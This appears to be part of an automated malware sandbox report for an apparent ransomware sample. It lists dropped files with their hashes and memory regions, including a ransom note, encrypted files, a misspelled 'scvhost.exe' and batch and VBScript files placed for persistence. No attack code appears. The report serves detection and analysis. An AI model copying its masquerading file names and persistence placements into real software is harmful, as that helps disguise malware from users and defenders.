  SHA256: 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
  SHA512: ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0aa63dbb46d451e47a7a682c64af776d
  SHA1: 3b0026f2dae8e9c491ccaa40133755779de35aaa
  SHA256: 9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
  SHA512: 4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: ade8b780188478d4bf68c97bc995b06f
  SHA1: 0b5124fca500da8f833a3be98bd5f732d3962343
  SHA256: 318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
  SHA512: c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 77d622bb1a5b250869a3238b9bc1402b
  SHA1: d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbjw42h.hkb.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\mshta.exe
  Filesize: 70KB
  MD5: c5431c4b11742bc4ab73e896dd47153b
  SHA1: 16e6869c71d4ee978dfcc29b48f277f55828a331
  SHA256: bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a
  SHA512: 888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37

C:\Users\Admin\AppData\Local\Temp\scvhost.exe
  Filesize: 63KB
  MD5: 1ca366d46cb1726508257459a9cbbf3f
  SHA1: 183e7cd4165bd195cb05c7e474037f2a22707c67
  SHA256: 76bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129
  SHA512: aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be

C:\Users\Admin\AppData\Roaming\Windows_Log_79.bat
  Filesize: 292KB
  MD5: cf1da3f20349f15bfacf7c271d60684c
  SHA1: ad4a58069d800ca900c5752929aa92d5d87fe3c7
  SHA256: ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
  SHA512: 8743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd

C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbs
  Filesize: 114B
  MD5: f615b865b89d6fca3489d69259aafb5b
  SHA1: 1cfa88e74aab33ae68a459efcd6ea555a06879f3
  SHA256: 9848f4bb516ef9e3ccb06f85f77b42f6b8ed37244e227a7cc36d26819cd4e1de
  SHA512: ef9015602f5602f93370689b58fc8457f0ab1daf38ab8cd3bff49eabe9c84acfd62be9108448d45bddbac3fb2839cf12fc876984c20a678494ef3677cf736d37

C:\Users\Admin\Desktop\How To Decrypt My Files.html
  Filesize: 639B
  MD5: d2dbbc3383add4cbd9ba8e1e35872552
  SHA1: 020abbc821b2fe22c4b2a89d413d382e48770b6f
  SHA256: 5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be
  SHA512: bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
  Filesize: 16B
  MD5: 0dd236afd1221fd580963ddb2386e0e0
  SHA1: 094231d6cce22b826ff2268e77821c1999f34a1a
  SHA256: 660aa028e60bc170b254a6aac6c0ff56f599224d447b20558ed367d3dbf45d05
  SHA512: f62681a3be7995e34b00d048d3e17f53dc10a07eb15907f3ebc3d68162f690577b970c9fbedff1430e51d6a20f4ffa9fc276744257d3b563434204529b9020f5

\??\pipe\LOCAL\crashpad_924_OQOSYKDLIPCMOHRG
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1128-122-0x00000170606B0000-0x00000170606BC000-memory.dmp
  Filesize: 48KB

memory/1128-53-0x00000170606C0000-0x00000170606DA000-memory.dmp
  Filesize: 104KB

memory/3356-74-0x0000000000F50000-0x0000000000F66000-memory.dmp
  Filesize: 88KB

memory/3828-15-0x000001FA57C80000-0x000001FA57C88000-memory.dmp
  Filesize: 32KB

memory/3828-48-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3828-6-0x000001FA57C20000-0x000001FA57C42000-memory.dmp
  Filesize: 136KB

memory/3828-11-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3828-0-0x00007FFCB4233000-0x00007FFCB4235000-memory.dmp
  Filesize: 8KB

memory/3828-12-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3828-13-0x000001FA57CA0000-0x000001FA57CE4000-memory.dmp
  Filesize: 272KB

memory/3828-14-0x000001FA580E0000-0x000001FA58156000-memory.dmp
  Filesize: 472KB

memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmp
  Filesize: 288KB

memory/3868-31-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3868-18-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3868-19-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/3868-29-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmp
  Filesize: 10.8MB

memory/4572-120-0x000000001CAB0000-0x000000001CABE000-memory.dmp
  Filesize: 56KB

memory/4572-75-0x0000000000C60000-0x0000000000C78000-memory.dmp
  Filesize: 96KB